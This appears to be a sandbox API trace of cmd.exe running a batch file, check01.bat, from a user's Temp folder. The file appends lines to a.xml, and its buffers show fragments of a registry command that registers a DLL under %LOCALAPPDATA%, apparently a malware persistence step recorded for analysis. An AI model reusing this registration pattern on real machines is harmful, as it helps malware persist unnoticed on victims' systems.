[0378.723] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
[0378.723] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x50a, lpOverlapped=0x0) returned 1
[0378.724] SetFilePointer (in: hFile=0x64, lDistanceToMove=2632, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0378.724] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=32, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n3-AB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 32
[0378.724] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.724] GetFileType (hFile=0x64) returned 0x1
[0378.724] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.724] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0378.724] GetProcessHeap () returned 0x200000
[0378.724] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2393d0
[0378.725] GetProcessHeap () returned 0x200000
[0378.725] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23d3f0
[0378.725] GetProcessHeap () returned 0x200000
[0378.725] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.725] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.725] GetProcessHeap () returned 0x200000
[0378.725] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.725] GetProcessHeap () returned 0x200000
[0378.725] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3f0 | out: hHeap=0x200000) returned 1
[0378.725] GetProcessHeap () returned 0x200000
[0378.726] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2393d0 | out: hHeap=0x200000) returned 1
[0378.726] _tell (_FileHandle=3) returned 2632
[0378.726] _close (_FileHandle=3) returned 0
[0378.726] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.727] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.727] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.727] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.727] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.727] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.727] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.727] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.727] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.727] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.727] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.727] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.734] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.734] GetFileType (hFile=0x7) returned 0x2
[0378.735] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.735] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.735] _dup (_FileHandle=1) returned 3
[0378.736] _close (_FileHandle=1) returned 0
[0378.737] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.737] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.738] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.738] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.738] GetFileType (hFile=0x64) returned 0x1
[0378.738] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x503
[0378.738] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x502
[0378.738] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.738] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.739] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x216d70, Size=0x26) returned 0x21b120
[0378.739] GetProcessHeap () returned 0x200000
[0378.739] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b120) returned 0x26
[0378.739] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 10
[0378.739] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.739] GetFileType (hFile=0x64) returned 0x1
[0378.739] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.739] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 11
[0378.739] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0xa, lpOverlapped=0x0) returned 1
[0378.740] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.750] _close (_FileHandle=3) returned 0
[0378.751] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.751] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.752] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.752] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.753] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.753] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.754] SetConsoleInputExeNameW () returned 0x1
[0378.754] GetConsoleOutputCP () returned 0x1b5
[0378.754] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.754] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.754] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.755] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.755] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.755] SetFilePointer (in: hFile=0x64, lDistanceToMove=2632, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0378.755] GetProcessHeap () returned 0x200000
[0378.755] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.755] GetProcessHeap () returned 0x200000
[0378.755] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b120 | out: hHeap=0x200000) returned 1
[0378.756] GetProcessHeap () returned 0x200000
[0378.756] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b150 | out: hHeap=0x200000) returned 1
[0378.756] GetProcessHeap () returned 0x200000
[0378.756] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.756] GetProcessHeap () returned 0x200000
[0378.756] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.756] GetProcessHeap () returned 0x200000
[0378.756] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.756] GetProcessHeap () returned 0x200000
[0378.756] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.756] GetProcessHeap () returned 0x200000
[0378.756] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0378.757] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.757] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0378.757] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x4ea, lpOverlapped=0x0) returned 1
[0378.757] SetFilePointer (in: hFile=0x64, lDistanceToMove=2667, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0378.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=35, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 35
[0378.757] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.757] GetFileType (hFile=0x64) returned 0x1
[0378.757] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.758] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0378.758] GetProcessHeap () returned 0x200000
[0378.758] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2393d0
[0378.758] GetProcessHeap () returned 0x200000
[0378.758] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23d3f0
[0378.758] GetProcessHeap () returned 0x200000
[0378.758] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.758] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.758] GetProcessHeap () returned 0x200000
[0378.758] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.758] GetProcessHeap () returned 0x200000
[0378.759] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3f0 | out: hHeap=0x200000) returned 1
[0378.759] GetProcessHeap () returned 0x200000
[0378.759] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2393d0 | out: hHeap=0x200000) returned 1
[0378.759] _tell (_FileHandle=3) returned 2667
[0378.760] _close (_FileHandle=3) returned 0
[0378.760] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.760] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.760] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.760] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.760] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.760] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.760] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.760] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.761] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.761] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.761] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.761] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.761] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.761] GetFileType (hFile=0x7) returned 0x2
[0378.762] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.762] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.762] _dup (_FileHandle=1) returned 3
[0378.763] _close (_FileHandle=1) returned 0
[0378.766] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.766] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.766] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.766] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.766] GetFileType (hFile=0x64) returned 0x1
[0378.767] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50d
[0378.767] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x50c
[0378.767] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.767] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.768] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x228690, Size=0x2c) returned 0x216db0
[0378.768] GetProcessHeap () returned 0x200000
[0378.768] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x216db0) returned 0x2c
[0378.768] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 13
[0378.768] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.768] GetFileType (hFile=0x64) returned 0x1
[0378.768] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.768] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 14
[0378.768] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0xd, lpOverlapped=0x0) returned 1
[0378.768] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.771] _close (_FileHandle=3) returned 0
[0378.772] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.772] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.773] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.773] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.774] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.774] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.774] SetConsoleInputExeNameW () returned 0x1
[0378.774] GetConsoleOutputCP () returned 0x1b5
[0378.775] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.775] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.775] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.775] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.776] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.776] SetFilePointer (in: hFile=0x64, lDistanceToMove=2667, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0378.776] GetProcessHeap () returned 0x200000
[0378.776] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216df0 | out: hHeap=0x200000) returned 1
[0378.776] GetProcessHeap () returned 0x200000
[0378.776] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0378.776] GetProcessHeap () returned 0x200000
[0378.776] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.776] GetProcessHeap () returned 0x200000
[0378.776] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.777] GetProcessHeap () returned 0x200000
[0378.777] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.777] GetProcessHeap () returned 0x200000
[0378.777] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.777] GetProcessHeap () returned 0x200000
[0378.777] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.777] GetProcessHeap () returned 0x200000
[0378.777] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0378.777] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.777] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0378.778] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x4c7, lpOverlapped=0x0) returned 1
[0378.778] SetFilePointer (in: hFile=0x64, lDistanceToMove=2699, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0378.778] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=32, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nl\r\nB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 32
[0378.778] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.778] GetFileType (hFile=0x64) returned 0x1
[0378.778] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.778] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0378.778] GetProcessHeap () returned 0x200000
[0378.778] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2393d0
[0378.779] GetProcessHeap () returned 0x200000
[0378.779] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23d3f0
[0378.779] GetProcessHeap () returned 0x200000
[0378.779] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.779] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.779] GetProcessHeap () returned 0x200000
[0378.779] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.779] GetProcessHeap () returned 0x200000
[0378.779] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3f0 | out: hHeap=0x200000) returned 1
[0378.780] GetProcessHeap () returned 0x200000
[0378.780] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2393d0 | out: hHeap=0x200000) returned 1
[0378.780] _tell (_FileHandle=3) returned 2699
[0378.780] _close (_FileHandle=3) returned 0
[0378.781] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.781] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.781] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.781] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.781] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.781] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.781] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.781] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.781] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.781] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.781] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.781] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.781] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.782] GetFileType (hFile=0x7) returned 0x2
[0378.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.782] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.783] _dup (_FileHandle=1) returned 3
[0378.784] _close (_FileHandle=1) returned 0
[0378.784] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.785] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.785] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.785] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.785] GetFileType (hFile=0x64) returned 0x1
[0378.785] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51a
[0378.785] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x519
[0378.785] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.785] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.786] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x216d70, Size=0x26) returned 0x21b120
[0378.786] GetProcessHeap () returned 0x200000
[0378.786] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b120) returned 0x26
[0378.786] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 10
[0378.786] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.786] GetFileType (hFile=0x64) returned 0x1
[0378.786] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.786] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 11
[0378.787] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0xa, lpOverlapped=0x0) returned 1
[0378.787] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.788] _close (_FileHandle=3) returned 0
[0378.789] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.789] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.790] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.790] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.791] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.791] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.792] SetConsoleInputExeNameW () returned 0x1
[0378.792] GetConsoleOutputCP () returned 0x1b5
[0378.792] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.792] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.792] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.793] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.793] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.793] SetFilePointer (in: hFile=0x64, lDistanceToMove=2699, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0378.793] GetProcessHeap () returned 0x200000
[0378.793] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.793] GetProcessHeap () returned 0x200000
[0378.793] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b120 | out: hHeap=0x200000) returned 1
[0378.794] GetProcessHeap () returned 0x200000
[0378.794] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b150 | out: hHeap=0x200000) returned 1
[0378.794] GetProcessHeap () returned 0x200000
[0378.794] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.794] GetProcessHeap () returned 0x200000
[0378.794] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.794] GetProcessHeap () returned 0x200000
[0378.794] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.794] GetProcessHeap () returned 0x200000
[0378.794] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.794] GetProcessHeap () returned 0x200000
[0378.794] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0378.795] _get_osfhandle (_FileHandle=3) returned 0x64
